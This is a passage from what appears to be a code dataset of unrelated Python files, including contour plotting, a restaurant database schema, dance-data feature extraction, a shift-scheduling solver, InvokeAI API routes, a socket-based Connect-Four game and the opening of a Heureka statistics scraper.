contribution_nr > 11:\r\n # Because contribution 9 holds 3 sets of contours.\r\n contribution_nr = contribution_nr - 2\r\n folder_name = 'results/exercise-1/contribution-' + str(contribution_nr)\r\n file_name = folder_name + '/' + lastname_firstname[i] + '_dataset_' + \\\r\n dataset_char + '_' + str(return_period) + '.txt'\r\n if contribution_nr in (1, 2, 3, 5, 6, 8, 10):\r\n (hs, v) = read_contour(file_name)\r\n else:\r\n (v, hs) = read_contour(file_name)\r\n contour = Object()\r\n contour.c = (np.append(v, v[0]), np.append(hs, hs[0]))\r\n contours.append(contour)\r\n contours_v.append(v)\r\n contours_hs.append(hs)\r\n max_hs_on_contours[i] = max(hs[~np.isnan(hs)])\r\n\r\n# Compute the min, max and median contour.\r\n# First, define the origin and angles based on normalization.\r\nv0 = np.mean(v_p)\r\nhs0 = np.mean(hs_p)\r\nangle_step_for_ci = 2\r\ntheta_stars = np.arange(0, 360, angle_step_for_ci) / 180 * np.pi\r\nt1 = max(v_p) - min(v_p)\r\nt2 = max(hs_p) - min(hs_p)\r\nthetas = thetastar_to_theta(theta_stars, t1, t2)\r\nnr_of_datapoints_on_angled_line = 10\r\nline_tot_length = 50.0\r\nline_length = np.linspace(0.0, line_tot_length, nr_of_datapoints_on_angled_line)\r\n\r\n# Then, compute lines that have an angle theta to the x-axis.\r\nfor i, contour in enumerate(contours):\r\n theta_line_v = list()\r\n theta_line_hs = list()\r\n contour.theta_v = list()\r\n contour.theta_hs = list()\r\n for j, theta in enumerate(thetas):\r\n theta_line_v.append(np.multiply(np.cos(theta), line_length) + v0)\r\n theta_line_hs.append(np.multiply(np.sin(theta), line_length) + hs0)\r\n theta_v_j, theta_hs_j = contour_intersection(\r\n theta_line_v[j], theta_line_hs[j], contour.c[0], contour.c[1], True)\r\n\r\n contour.theta_v.append(theta_v_j)\r\n contour.theta_hs.append(theta_hs_j)\r\n\r\n\r\ntheta_v_ij = np.zeros(shape=(len(contours), thetas.size))\r\ntheta_hs_ij = np.zeros(shape=(len(contours), thetas.size))\r\ndistance_to_origin_ij = np.zeros(shape=(len(contours), thetas.size))\r\nfor i, contour in enumerate(contours):\r\n for j, (v_j, hs_j) in enumerate(zip(contour.theta_v, contour.theta_hs)):\r\n theta_v_ij[i, j] = v_j\r\n theta_hs_ij[i, j] = hs_j\r\n o = np.array([v0, hs0])\r\n p = np.array([v_j, hs_j]).flatten()\r\n op = p - o\r\n distance_to_origin_ij[i, j] = np.sqrt(op[0]*op[0] + op[1]*op[1])\r\nsorted_v = np.zeros(shape=(len(contours), thetas.size))\r\nsorted_hs = np.zeros(shape=(len(contours), thetas.size))\r\nfor j in range(thetas.size):\r\n 
sorted_indices = np.argsort(distance_to_origin_ij[:, j])\r\n sorted_v[:, j] = theta_v_ij[sorted_indices, j]\r\n sorted_hs[:, j] = theta_hs_ij[sorted_indices, j]\r\nlower_index = 0\r\nmedian_index = 4\r\nupper_index = 8\r\n\r\ncl = Object()\r\ncm = Object()\r\ncu = Object()\r\n\r\ncl.v = sorted_v[lower_index, :]\r\ncl.hs = sorted_hs[lower_index, :]\r\ncm.v = sorted_v[median_index, :]\r\ncm.hs = sorted_hs[median_index, :]\r\ncu.v = sorted_v[upper_index, :]\r\ncu.hs = sorted_hs[upper_index, :]\r\n\r\n\r\n# Create the overlay plot.\r\naxs[0].scatter(v_p, hs_p, c='black', alpha=0.5, zorder=-2, rasterized=True, label='Dataset D (provided)')\r\nfor i in range(n_contours_to_analyze):\r\n if i == 0:\r\n clabel = 'Submitted 50-yr contours'\r\n else:\r\n clabel = None\r\n plot_contour(contours_v[i], contours_hs[i],\r\n alpha=0.5, ax=axs[0], contour_label=clabel)\r\n\r\naxs[0].set_rasterization_zorder(-1)\r\naxs[0].set_xlabel(label_v.capitalize())\r\naxs[0].set_ylabel(label_hs.capitalize())\r\n\r\n# Create the confidence bound plot.\r\naxs[1].scatter(v_p, hs_p, c='black', alpha=0.5, zorder=-2, rasterized=True)\r\nplot_confidence_interval(x_median=cm.v, y_median=cm.hs, \r\n x_bottom=cl.v, y_bottom=cl.hs, x_upper=cu.v, y_upper=cu.hs, ax=axs[1], \r\n x_label=label_v.capitalize(), y_label=label_hs.capitalize(), \r\n contour_labels=['Median contour', 'Min. contour', 'Max. contour'])\r\n \r\nfor ax in axs.flat:\r\n ax.label_outer()\r\n ax.set_xlim((0, 35))\r\n ax.set_ylim((0, 18))\r\nfig.tight_layout()\r\nfig.savefig('results/discussion/gfx/e1_confidence_bounds.pdf', bbox_inches='tight')\r\n","sub_path":"results/discussion/e1_confidence_bound.py","file_name":"e1_confidence_bound.py","file_ext":"py","file_size_in_byte":9392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"151890070","text":"import sys\nimport os\n\nfrom sqlalchemy import Column, ForeignKey, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import create_engine\n\nBase = declarative_base()\n\n#-----------------------------------------------------\n# Class representing the restaurant table in the\n# database. \n#-----------------------------------------------------\nclass Restaurant(Base):\n\t__tablename__ = 'restaurant'\n\tid = Column(Integer, primary_key = True)\n\tname = Column(String(80), nullable = False)\n\tdescription = Column(String(250), nullable = True)\n\taddress = Column(String(300), nullable = True)\n\tphone = Column(String(25), nullable = True)\n\twebsite = Column(String(100), nullable = True)\n\n\t@property\n\tdef serialize(self):\n\t\treturn { 'id': self.id,\n\t\t'name': self.name, \n\t\t'description': self.description, \n\t\t'adddress' : self.address, \n\t\t'phone' : self.phone, \n\t\t'website' : self.website }\n\n\t\n#-----------------------------------------------------\n# Class representing the menu item table in the\n# database. 
\n#----------------------------------------------------\t\nclass MenuItem(Base):\n\t__tablename__ = 'menu_item'\n\tid = Column(Integer, primary_key = True)\n\tname = Column(String(80), nullable = False)\n\tcourse = Column(String(250))\n\tdescription = Column(String(250))\n\tprice = Column(String(8))\n\trestaurant_id = Column(Integer, ForeignKey('restaurant.id'))\n\trestaurant = relationship(Restaurant)\n\t\n\t@property\n\tdef serialize(self):\n\t\treturn { \n\t\t'id': self.id,\n\t\t'name': self.name, \n\t\t'course' :self.course,\n\t\t'description': self.description, \n\t\t'price' : self.price}\n\t\t\n#-----------------------------------------------------\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.create_all(engine)\n","sub_path":"database/restaurant_database_setup.py","file_name":"restaurant_database_setup.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"609504201","text":"import pandas as pd\nimport numpy as np\nfrom os import listdir\n\ndef data_process(input_data):\n # extract features from raw data\n # mean, variance, median, mean absolute deviation, max, min\n X = []\n for i in range(len(input_data[0])):\n data = []\n for j in range(len(input_data)):\n data.append(input_data[j][i])\n # mean\n X.append(np.mean(data))\n # variance\n X.append(np.var(data))\n # median\n X.append(np.median(data))\n # mean absolute deviation\n X.append(np.mean(np.absolute(data - np.mean(data))))\n # max\n X.append(max(data))\n # min\n X.append(min(data))\n return np.array(X)\n\nwindow_size = 50\ndance_data = np.array([[0.0]*91])\nfor f in listdir(\"../final_data/\"):\n if \".txt\" in f:\n dataframe = pd.read_csv(\"../final_data/\"+f, sep=\",\", header=None)\n dataset = dataframe.values\n print(f)\n i = 0\n while i+window_size <= len(dataset): \n X = dataset[i:i+window_size,0:15]\n X = data_process(X)\n if \"chicken\" in f:\n X = np.append(X, 0)\n if \"cowboy_front\" in f:\n X = np.append(X, 1)\n if \"cowboy_back\" in f:\n X = np.append(X, 2)\n if \"crab\" in f:\n X = np.append(X, 3)\n if \"hunchback\" in f:\n X = np.append(X, 4)\n if \"raffles_left\" in f:\n X = np.append(X, 5)\n if \"raffles_right\" in f:\n X = np.append(X, 6)\n if \"running\" in f:\n X = np.append(X, 7)\n if \"james\" in f:\n X = np.append(X, 8)\n if \"snake\" in f:\n X = np.append(X, 9)\n if \"double\" in f:\n X = np.append(X, 10)\n if \"mermaid\" in f:\n X = np.append(X, 11)\n if \"final\" in f:\n X = np.append(X, 12)\n dance_data = np.append(dance_data, [X], axis=0)\n i += 10\ndance_data = dance_data[1:]\nnp.savetxt(\"../final_data/processed_data/window50.csv\", dance_data, delimiter=\",\")\n","sub_path":"software/classifiers/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"491177528","text":"import pulp\nimport numpy as np\n\n#\n# ShiftSolver solves the linear problem of give team shift table\n# The number of shifts solved by ShiftSolver is at maximum `max_shift`\n#\n# Each request is a model.Request which has\n# (id, member, team, start_time, end_time, availability)\n#\n\nclass ShiftSolver:\n HOURS_IN_DAY = 24\n MINIMUM_MEMBERS = 3\n def __init__(self, team, member_list, days_in_shift=7):\n self.team = team\n self.member_list = member_list\n self.num_members = len(self.member_list)\n self.days_in_shift = days_in_shift\n self.problem = pulp.LpProblem('shift_table', 
pulp.LpMaximize)\n self.lp_variables = pulp.LpVariable.dicts(\n 'VAR',\n (range(self.num_members), range(self.days_in_shift), range(ShiftSolver.HOURS_IN_DAY)),\n 0, 1, 'Binary'\n )\n self.availability = np.zeros([\n self.num_members,\n self.days_in_shift,\n ShiftSolver.HOURS_IN_DAY\n ])\n\n def _init_availability(self, shift):\n '''\n @params shift: which includes (days, requests) in tuple format\n '''\n (days, requests, start_day) = shift\n start_in_shift = days[0]\n assert len(days) == self.days_in_shift\n for r in requests:\n if r.team == self.team:\n d = (r.start_time.date() - start_in_shift).days\n for t in xrange(r.start_time.hour, r.end_time.hour):\n self.availability[r.member][d][t] = r.availability\n\n\n\n def solve(self, shift):\n self._init_availability(shift)\n # Create the objective function\n obj = None\n for m in xrange(self.num_members):\n for d in xrange(self.days_in_shift):\n for t in xrange(ShiftSolver.HOURS_IN_DAY):\n obj += self.availability[m][d][t] * self.lp_variables[m][d][t]\n\n # Set objective function of this linear problem\n self.problem += obj\n\n # Set the contraint of variables of this problem\n for d in xrange(self.days_in_shift):\n for t in xrange(ShiftSolver.HOURS_IN_DAY):\n c = None\n for m in xrange(self.num_members):\n c += self.lp_variables[m][d][t]\n self.problem += c >= ShiftSolver.MINIMUM_MEMBERS\n\n status = self.problem.solve()\n\n result = np.zeros([self.num_members, self.days_in_shift, ShiftSolver.HOURS_IN_DAY])\n for m in xrange(self.num_members):\n for d in xrange(self.days_in_shift):\n for t in xrange(ShiftSolver.HOURS_IN_DAY):\n result[m][d][t] = self.lp_variables[m][d][t].value()\n\n return (pulp.LpStatus[status], result)\n","sub_path":"src/ShiftSolver.py","file_name":"ShiftSolver.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"491083241","text":"import typing\nfrom enum import Enum\nfrom fastapi import Body\nfrom fastapi.routing import APIRouter\nfrom pathlib import Path\nfrom pydantic import BaseModel, Field\n\nfrom invokeai.backend.image_util.patchmatch import PatchMatch\nfrom invokeai.backend.image_util.safety_checker import SafetyChecker\nfrom invokeai.backend.image_util.invisible_watermark import InvisibleWatermark\nfrom invokeai.app.invocations.upscale import ESRGAN_MODELS\n\nfrom invokeai.version import __version__\n\nfrom ..dependencies import ApiDependencies\nfrom invokeai.backend.util.logging import logging\n\n\nclass LogLevel(int, Enum):\n NotSet = logging.NOTSET\n Debug = logging.DEBUG\n Info = logging.INFO\n Warning = logging.WARNING\n Error = logging.ERROR\n Critical = logging.CRITICAL\n\n\nclass Upscaler(BaseModel):\n upscaling_method: str = Field(description=\"Name of upscaling method\")\n upscaling_models: list[str] = Field(description=\"List of upscaling models for this method\")\n\n\napp_router = APIRouter(prefix=\"/v1/app\", tags=[\"app\"])\n\n\nclass AppVersion(BaseModel):\n \"\"\"App Version Response\"\"\"\n\n version: str = Field(description=\"App version\")\n\n\nclass AppConfig(BaseModel):\n \"\"\"App Config Response\"\"\"\n\n infill_methods: list[str] = Field(description=\"List of available infill methods\")\n upscaling_methods: list[Upscaler] = Field(description=\"List of upscaling methods\")\n nsfw_methods: list[str] = Field(description=\"List of NSFW checking methods\")\n watermarking_methods: list[str] = Field(description=\"List of invisible watermark methods\")\n\n\n@app_router.get(\"/version\", 
operation_id=\"app_version\", status_code=200, response_model=AppVersion)\nasync def get_version() -> AppVersion:\n return AppVersion(version=__version__)\n\n\n@app_router.get(\"/config\", operation_id=\"get_config\", status_code=200, response_model=AppConfig)\nasync def get_config() -> AppConfig:\n infill_methods = [\"tile\", \"lama\"]\n if PatchMatch.patchmatch_available():\n infill_methods.append(\"patchmatch\")\n\n upscaling_models = []\n for model in typing.get_args(ESRGAN_MODELS):\n upscaling_models.append(str(Path(model).stem))\n upscaler = Upscaler(upscaling_method=\"esrgan\", upscaling_models=upscaling_models)\n\n nsfw_methods = []\n if SafetyChecker.safety_checker_available():\n nsfw_methods.append(\"nsfw_checker\")\n\n watermarking_methods = []\n if InvisibleWatermark.invisible_watermark_available():\n watermarking_methods.append(\"invisible_watermark\")\n\n return AppConfig(\n infill_methods=infill_methods,\n upscaling_methods=[upscaler],\n nsfw_methods=nsfw_methods,\n watermarking_methods=watermarking_methods,\n )\n\n\n@app_router.get(\n \"/logging\",\n operation_id=\"get_log_level\",\n responses={200: {\"description\": \"The operation was successful\"}},\n response_model=LogLevel,\n)\nasync def get_log_level() -> LogLevel:\n \"\"\"Returns the log level\"\"\"\n return LogLevel(ApiDependencies.invoker.services.logger.level)\n\n\n@app_router.post(\n \"/logging\",\n operation_id=\"set_log_level\",\n responses={200: {\"description\": \"The operation was successful\"}},\n response_model=LogLevel,\n)\nasync def set_log_level(\n level: LogLevel = Body(description=\"New log verbosity level\"),\n) -> LogLevel:\n \"\"\"Sets the log verbosity level\"\"\"\n ApiDependencies.invoker.services.logger.setLevel(level)\n return LogLevel(ApiDependencies.invoker.services.logger.level)\n","sub_path":"invokeai/app/api/routers/app_info.py","file_name":"app_info.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"517578487","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom additional.settingsWindow import *\nimport socket\n\n#class for intitializing socket and socket functions\n#__init__ decided whether socket should act as server or client\n#creates integer userInput: 1 for server, 2 for client\n#can be hard coded or user inputted ip and port\n\nclass sockFunc:\n def __init__(self,dialog):\n if dialog != None:\n self.userInput = dialog[0]\n elif not dialog or dialog == None:\n self.userInput = None\n if self.userInput == 1:\n self.sockHost = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.servPort = dialog[1]\n self.sockHost.bind((\"\",int(self.servPort)))\n self.sockHost.listen(1)\n self.sockHost.settimeout(0.3)\n q = 0\n while True:\n if q%3 == 0:\n statusBar.config(text=\"Waiting on opponent. \")\n elif q%3 == 1:\n statusBar.config(text=\"Waiting on opponent.. 
\")\n elif q%3 == 2:\n statusBar.config(text=\"Waiting on opponent...\")\n root.update()\n try:\n self.sock, self.addr = self.sockHost.accept()\n except:\n q += 1\n continue\n if self.sock and self.addr:\n statusBar.config(text=\"\")\n break\n print(\"Connection received from \",self.addr)\n self.startOrder = self.userInput\n elif self.userInput == 2:\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.servIP = dialog[1]\n self.servPort = dialog[2]\n self.sock.connect((self.servIP,int(self.servPort)))\n print(\"Connected to server at \",self.servIP,\":\",self.servPort)\n if self.servIP == '192.232.224.13' or self.servIP == '192.232.224.14': #looks for the dedicated server\n self.startOrder = self.rcvData()\n else:\n self.startOrder = self.userInput\n else:\n print(\"Aborted.\")\n def sendData(self, dataOut):\n self.dataOut = str(dataOut).encode()\n self.sock.sendall(self.dataOut)\n def rcvData(self):\n self.sock.settimeout(0.3)\n q = 0\n while True:\n if q%3 == 0:\n statusBar.config(text=\"Waiting on opponent. \")\n elif q%3 == 1:\n statusBar.config(text=\"Waiting on opponent.. \")\n elif q%3 == 2:\n statusBar.config(text=\"Waiting on opponent...\")\n root.update()\n try:\n self.dataIn = self.sock.recv(4096)\n except:\n q += 1\n continue\n if self.dataIn:\n statusBar.config(text=\"\")\n break\n if self.dataIn.decode() != '86':\n return int(self.dataIn.decode())\n elif self.dataIn.decode() == '86':\n statusBar.config(text=\"Disconnected.\")\n popup = Tk()\n popup.protocol(\"WM_DELETE_WINDOW\", lambda: popupButton(popup,767))\n drawButton = Button(popup,text=\"Opponent disconnected\",command=lambda: popupButton(popup,767))\n drawButton.pack()\n print(\"Opponent Disconnected\")\n return 767\n def __del__(self):\n self.sock.close()\n print(\"Closed\")\n\n#takes a player color, row, col\n#player 1 is blue\n#player 2 is red\n#can change this with global pColor\n\ndef puckDraw(pColor,row,col):\n if pColor == 1:\n tempLbl = imgCanv.create_image(42.5+(80*col),42.5, image=bluepuck)\n imgCanv.tag_lower(tempLbl)\n imgCanv.update()\n if pColor == 2:\n tempLbl = imgCanv.create_image(42.5+(80*col),42.5, image=redpuck)\n imgCanv.tag_lower(tempLbl)\n imgCanv.update()\n for x in range(row*40):\n imgCanv.move(tempLbl, 0, 2)\n imgCanv.update()\n\n#winfound takes a player identifier\n#creates a popup message dependent on player number\n\ndef winfound(player):\n popup = Tk()\n if player == 1:\n popup.protocol(\"WM_DELETE_WINDOW\", lambda: popupButton(popup,1))\n winButton = Button(popup,text=\"You Won\",command=lambda: popupButton(popup,1))\n else:\n popup.protocol(\"WM_DELETE_WINDOW\", lambda: popupButton(popup,2))\n winButton = Button(popup,text=\"You Lost\",command=lambda: popupButton(popup,2))\n winButton.pack()\n\n#takes the last played row and column and checks for a win\n#returns true or false\n#does not check who won\n\ndef wincheck(row,column,xtemp,ytemp):\n while (xtemp <= 1) and (ytemp <= 1):\n if (row+xtemp < 6 and column+ytemp < 7) and (row+xtemp > -1 and column+ytemp > -1):\n if matrix[row,column] == matrix[row+xtemp,column+ytemp]:\n if (row+(xtemp*-1) < 6 and column+(ytemp*-1) < 7) and (row+(xtemp*-1) > -1 and column+(ytemp*-1) > -1):\n if matrix[row,column] == matrix[row+(xtemp*-1),column+(ytemp*-1)]:\n if (row+(xtemp*2) < 6 and column+(ytemp*2) < 7) and (row+(xtemp*2) > -1 and column+(ytemp*2) > -1):\n if matrix[row,column] == matrix[row+(xtemp*2),column+(ytemp*2)]:\n #print(\"win found at:\",row+xtemp*2,column+ytemp*2)\n return TRUE\n if (row+(xtemp*2)*-1 < 6 and 
column+(ytemp*2)*-1 < 7) and (row+(xtemp*2)*-1 > -1 and column+(ytemp*2)*-1 > -1):\n if matrix[row,column] == matrix[row+(xtemp*2)*-1,column+(ytemp*2)*-1]: \n #print(\"alt win found at:\",row+(xtemp*2)*-1,column+(ytemp*2)*-1)\n return TRUE\n if (row+(xtemp*2) < 6 and column+(ytemp*2) < 7) and (row+(xtemp*2) > -1 and column+(ytemp*2) > -1):\n if matrix[row,column] == matrix[row+(xtemp*2),column+(ytemp*2)]:\n if (row+(xtemp*3) < 6 and column+(ytemp*3) < 7) and (row+(xtemp*3) > -1 and column+(ytemp*3) > -1):\n if matrix[row,column] == matrix[row+(xtemp*3),column+(ytemp*3)]:\n #print(\"four in a row:\",row+xtemp*3,column+ytemp*3)\n return TRUE\n xtemp += 1\n if (xtemp == 0) and (ytemp == 0):\n xtemp += 1\n if xtemp == 2:\n ytemp += 1\n xtemp = -1\n return FALSE\n\n#function to check for a draw condition\n#creates a popup window if true\n\ndef drawCheck():\n for x in range(7):\n if matrix[0,x] == 0:\n break\n if x == 6 and matrix[0,6] != 0:\n popup = Tk()\n popup.protocol(\"WM_DELETE_WINDOW\", lambda: popupButton(popup,3))\n drawButton = Button(popup,text=\"Draw\",command=lambda: popupButton(popup,3))\n drawButton.pack()\n return 1\n return 0\n\n#returns an alternating value 1/2 from argument\n\ndef turnchange(turn):\n if turn == 1:\n turn = 2\n elif turn == 2:\n turn = 1\n return turn\n\n#first wait for being client\ndef firstWait():\n column = userSock.rcvData()\n if column != 767:\n dropPuck(column,turnchange(pNumb),turnchange(pColor))\n\n#find row\n#set matrix value to pNumb\n#draw the puck\n#check for win -> if true winfound\n#check for top row -> if true check for draw\n\ndef dropPuck(column,pNumb,pColor):\n statusBar.config(text=\"\")\n global matrix\n global buttStatus\n x = 5\n while matrix[x][column] != 0:\n x -= 1\n matrix[x][column] = pNumb\n puckDraw(pColor,x,column)\n winStatus = wincheck(x,column,-1,-1)\n if winStatus == TRUE:\n winfound(pNumb)\n return 1\n if x == 0:\n buttFunc[column].config(state=DISABLED)\n buttStatus[column] = 1\n return drawCheck()\n return 0\n\ndef dropMain(column, pOrder, pNumb, pColor):\n winBreak = dropPuck(column, pNumb, pColor)\n userSock.sendData(column)\n for q in range(7):\n buttFunc[q].config(state=DISABLED)\n root.update()\n if winBreak == 0: #prevents hanging for winning player side\n column = userSock.rcvData()\n if column != 767:\n winBreak = dropPuck(column,turnchange(pNumb),turnchange(pColor)) #calls drop with alternate pNumb from 1(player 1) to 2(opponent)\n if winBreak == 0: #prevents hanging for losing player side\n for q in range(7):\n if buttStatus[q] == 0:\n buttFunc[q].config(state=NORMAL)\n \n\n#resets the matrix and image canvas\n#conditionally change the start orders\n#increments game score\n\ndef reset(gameEnd):\n global matrix\n global startOrder\n global buttStatus\n global pScore\n global oScore\n for q in range(7):\n buttStatus[q] = 0\n matrix = np.zeros((6,7))\n imgCanv.delete(ALL)\n gridLbl = imgCanv.create_image(282.5, 242.5, image=grid)\n #startOrder is the global start of round variable\n if gameEnd == 1: #player won - start second\n startOrder = 2\n pScore += 1\n pScoreLbl.config(text=\"Player: \"+str(pScore))\n elif gameEnd == 2: #player lost - start first\n startOrder = 1\n oScore += 1\n oScoreLbl.config(text=\"Opponent: \"+str(oScore))\n elif gameEnd == 3: #draw - alternate start orders\n startOrder = turnchange(startOrder)\n if startOrder == 2 and userSock.userInput == 2:\n if userSock.servIP == '192.232.224.13' or userSock.servIP == '192.232.224.14':\n userSock.sendData(69) #sends a flag to dedicated server on 
draw\n else: #first round decided by serv/client\n startOrder = userSock.startOrder\n if startOrder == 1:\n for q in range(7):\n buttFunc[q].config(state=NORMAL)\n elif startOrder == 2:\n for q in range(7):\n buttFunc[q].config(state=DISABLED)\n firstWait()\n for q in range(7):\n buttFunc[q].config(state=NORMAL)\n\ndef callback():\n userSock.sendData(86)\n root.destroy()\n\n#function to be called on button press after win/draw\n#destroys window\n#calls for reset\n\ndef popupButton(window,gameEnd):\n if gameEnd == 767:\n window.destroy()\n root.destroy()\n else:\n window.destroy()\n reset(gameEnd)\n\ndialogBox = settingsWindow()\n\nroot = Tk()\nroot.title(\"Four in a row\")\nbuttFrame = Frame(root)\nbuttFrame.pack()\n\n#puck image size = 150, 150\n#grid image size = 1130, 970\nimgCanv = Canvas(root, width=565, height=485)\nimgCanv.pack_propagate(0)\nimgCanv.pack()\n\nimgFile1 = Image.open(\"resources/grid.png\")\nimgWidth,imgHeight = imgFile1.size\nimgFile1.thumbnail((imgWidth*0.5,imgHeight*0.5))\ngrid = ImageTk.PhotoImage(imgFile1)\n\nimgFile2 = Image.open(\"resources/redpuck.png\")\nimgWidth,imgHeight = imgFile2.size\nimgFile2.thumbnail((imgWidth*0.5,imgHeight*0.5))\nredpuck = ImageTk.PhotoImage(imgFile2)\n\nimgFile3 = Image.open(\"resources/bluepuck.png\")\nimgWidth,imgHeight = imgFile3.size\nimgFile3.thumbnail((imgWidth*0.5,imgHeight*0.5))\nbluepuck = ImageTk.PhotoImage(imgFile3)\n\nbut1 = Button(text=\"1\",command=lambda: dropMain(0,startOrder,pNumb,pColor),state=DISABLED)\nbut1.grid(in_=buttFrame,ipadx=22,row=0,column=0,sticky=W+E)\nbut2 = Button(text=\"2\",command=lambda: dropMain(1,startOrder,pNumb,pColor),state=DISABLED)\nbut2.grid(in_=buttFrame,ipadx=22,row=0,column=1,sticky=W+E)\nbut3 = Button(text=\"3\",command=lambda: dropMain(2,startOrder,pNumb,pColor),state=DISABLED)\nbut3.grid(in_=buttFrame,ipadx=22,row=0,column=2,sticky=W+E)\nbut4 = Button(text=\"4\",command=lambda: dropMain(3,startOrder,pNumb,pColor),state=DISABLED)\nbut4.grid(in_=buttFrame,ipadx=22,row=0,column=3,sticky=W+E)\nbut5 = Button(text=\"5\",command=lambda: dropMain(4,startOrder,pNumb,pColor),state=DISABLED)\nbut5.grid(in_=buttFrame,ipadx=22,row=0,column=4,sticky=W+E)\nbut6 = Button(text=\"6\",command=lambda: dropMain(5,startOrder,pNumb,pColor),state=DISABLED)\nbut6.grid(in_=buttFrame,ipadx=22,row=0,column=5,sticky=W+E)\nbut7 = Button(text=\"7\",command=lambda: dropMain(6,startOrder,pNumb,pColor),state=DISABLED)\nbut7.grid(in_=buttFrame,ipadx=22,row=0,column=6,sticky=W+E)\n\npScore = 0 #player score tracker\noScore = 0 #opponent score tracker\npColor = dialogBox.colorInput #color decided by dialog box\npNumb = 1 #constant, player is always set to 1 for matrix functions\n\nstatusFrame = Frame(root)\nstatusFrame.grid_columnconfigure(1,minsize=150)\npScoreLbl = Label(root,text=\"Player: \"+str(pScore))\npScoreLbl.grid(in_=statusFrame,padx=50,row=0,column=0)\noScoreLbl = Label(root,text=\"Opponent: \"+str(oScore))\noScoreLbl.grid(in_=statusFrame,padx=50,row=0,column=2)\nstatusBar = Label(root,text=\"\")\nstatusBar.grid(in_=statusFrame,row=0,column=1)\nstatusFrame.pack()\n\nbuttFunc = {0:but1,1:but2,2:but3,3:but4,4:but5,5:but6,6:but7}\nbuttStatus = [0,0,0,0,0,0,0]\n#buttStatus will be used to track full column button disables\n#buttons should be disabled/enabled depending on sending/receiving data\n\nuserSock = sockFunc(dialogBox.networkInputs)\n\nroot.protocol(\"WM_DELETE_WINDOW\", 
callback)\n\nreset(0)\n\nroot.mainloop()\n","sub_path":"c4_net_cli.py","file_name":"c4_net_cli.py","file_ext":"py","file_size_in_byte":12997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"420531792","text":"import csv\nimport datetime\nfrom datetime import date, timedelta\nimport pandas as pd\nfrom lxml import html\nimport time\nimport mechanicalsoup\nfrom bs4 import BeautifulSoup\nfrom keboola import docker\n\n# This is the way to store data in config files:\n# cfg = docker.Config('data')\ncfg = docker.Config('/data/')\nparameters = cfg.get_parameters()\n# load category ids to scrape\n# df = pd.read_csv('in/tables/categories_to_scrape.csv')\n# category_ids = df.category_id\n\n# date format checker\ndef validate(date_text):\n    try:\n        datetime.datetime.strptime(date_text, '%Y-%m-%d')\n    except ValueError:\n        raise ValueError(\"Incorrect date format, should be YYYY-MM-DD\")\n\n# initialize scrape_dates dict.\nscrape_dates = {}\n\n# Date preset from input parameters: either date_preset='Yesterday'/'last_week', or all dates in the given interval.\n# NOTE: the 'Date_preset' parameter takes precedence.\nif parameters.get('Date_preset') == 'Yesterday':\n    yesterday = date.today() - timedelta(1)\n    d1 = yesterday\n    d2 = d1\nelif parameters.get('Date_preset') == 'last_week':\n    d1 = date.today() - timedelta(7)\n    d2 = date.today() - timedelta(1)\nelif parameters.get('Date_preset') == 'last_3_days':\n    d1 = date.today() - timedelta(3)\n    d2 = date.today() - timedelta(1)\nelif parameters.get('Date_preset') == 'last_31_days':\n    d1 = date.today() - timedelta(31)\n    d2 = date.today() - timedelta(1)\nelif parameters.get('Date_preset') == 'last_year':\n    d1 = date.today() - timedelta(365)\n    d2 = date.today() - timedelta(1)\n# custom date range if no preset is given\nelse:\n    validate(parameters.get('Date_from'))\n    validate(parameters.get('Date_to'))\n    d1 = datetime.datetime.strptime(parameters.get('Date_from'), '%Y-%m-%d')\n    d2 = datetime.datetime.strptime(parameters.get('Date_to'), '%Y-%m-%d')\n# compute the timedelta that determines how many days back to fetch\ndelta = d2 - d1\nfor i in range(delta.days+1):\n    scrape_dates[i] = (d1+timedelta(i)).strftime('%Y-%m-%d')\n\n# Divide scraped results into two columns, value and currency,\n# so it is easy to work with EUR or another currency in the future.\n\ndef sanitizeStrings(text):\n    textSplitted = text.string.rsplit(None, 1)\n    firstResultTemp = textSplitted[0].replace('\\xa0', '') # if value > 999 the result would be 'X XXX'\n    firstResult = firstResultTemp.replace(',', '.')\n    secondResult = textSplitted[1]\n    return firstResult, secondResult\n\n\n# yesterday = date.today() - timedelta(1)\n# desired_date = date.today() - timedelta(DATE_PERIOD)\n\n\n# print('Scraping from ' + desired_date.strftime('%Y-%m-%d') + ' to ' + yesterday.strftime('%Y-%m-%d'))\n\n# count days between dates\n# delta = yesterday - desired_date\n\n# for i in range(delta.days+1):\n#     scrape_dates[i]=(desired_date+timedelta(i)).strftime('%Y-%m-%d')\n\nfor i in range(len(scrape_dates)):\n    scrape_date = scrape_dates[i]\n    print(\"Started scraping for \" + scrape_date)\n    for entity in parameters.get('Entity').keys():\n        for login in parameters.get('Entity').get(entity).keys():\n            # Create a browser object\n            browser = mechanicalsoup.Browser()\n\n            if entity == 'Heureka.cz':\n                Url_login = 'https://ucet.heureka.cz/prihlaseni'\n            if entity == 'Heureka.sk':\n                Url_login = 'https://ucet.heureka.sk/prihlasenie'\n\n            login_page = browser.get(Url_login)\n\n            # grab the login form\n            login_form = 
